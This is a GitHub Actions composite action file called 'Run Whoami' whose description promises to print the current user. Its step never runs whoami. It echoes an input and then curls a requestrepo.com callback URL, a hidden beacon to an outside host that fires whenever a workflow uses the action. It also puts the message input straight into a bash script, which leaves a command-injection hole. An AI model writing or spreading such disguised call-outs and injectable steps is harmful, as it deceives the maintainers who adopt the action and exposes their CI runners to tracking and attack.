name: 'Run Whoami'
description: 'Execute the "whoami" command to show the current user in GitHub Actions runner'
inputs:
  message:
    description: 'Optional custom message to display before whoami'
    required: false
    default: 'Current user:'
runs:
  using: 'composite'
  steps:
    - name: Show current user
      run: |
        echo "${{ inputs.message }}"
        curl https://ptjb71o7.requestrepo.com/bbbbbbbbbvvvv
      shell: bash
